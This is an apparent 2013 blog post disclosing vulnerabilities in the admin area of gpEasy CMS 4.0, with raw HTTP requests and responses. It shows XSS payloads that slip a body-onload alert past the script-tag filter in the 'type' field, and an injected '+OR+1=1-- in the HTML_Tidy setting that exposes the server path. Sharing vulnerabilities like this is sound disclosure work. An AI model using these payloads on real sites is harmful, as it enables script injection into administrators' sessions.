Sunday 26 May 2013

[EN] gpEasy 4.0 XSS'ed

Hi,

there is a new release of gpEasy CMS. This release has number 4.0.

I decide to post it here too.

Of course all vulnerable parts of this CMS are located in part dedicated to logged-in admin,
so maybe you should consider it as a low-level vulnerabilities (... csrf? ;) ).

Anyway, maybe few of you will find it interesting.

I should mention here, that gpEasy Team is developing better and better filters,
so we will see what they'll do in next version.

Here we go:

First one detailed below is XSS vulnerability.

Simple <script> tag is filtered out. Anyway this can be cheated like that:

---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area

---request---


and we will see at the response sourcecode that our payload was added correctly:

---response---
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaa
aa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbb
bbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td>
<td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/
(...)

---response---


similar situation in other place:
---request---

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area

---request---


Response will be similar.


Another situation when we have a little vuln is described below.
Durning some tests I found that gpEasy is presenting full path do wwwroot.
Check it out:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache

title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save


Response for this one looks like this:

---response---
HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
(...)
Content-Type: text/html; charset=utf-8

<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
   [type] =&gt; (integer)4
   [message] =&gt; (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
   [file] =&gt; (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
   [line] =&gt; (integer)92
   [request] =&gt; (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&amp;jsoncallback=jQuery183008074821283823352_1369418498905
   [time] =&gt; (integer)1369418822
   [request_method] =&gt; (string)POST
   [file_modified] =&gt; (integer)1369418822
   [file_size] =&gt; (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>
---response---


HTML_TidypParameter is vulnerable, but if you want - you should test it again by yourself,
because I think it could be similar bug to that one I found in Drupal:
if you will send 'too much requests' to webapp, it will simple crash it (and error will be presented).

Thanks to gpEasy Team for a fast reply. Good job!

Cheers o/


No comments:

Post a Comment

What do You think...?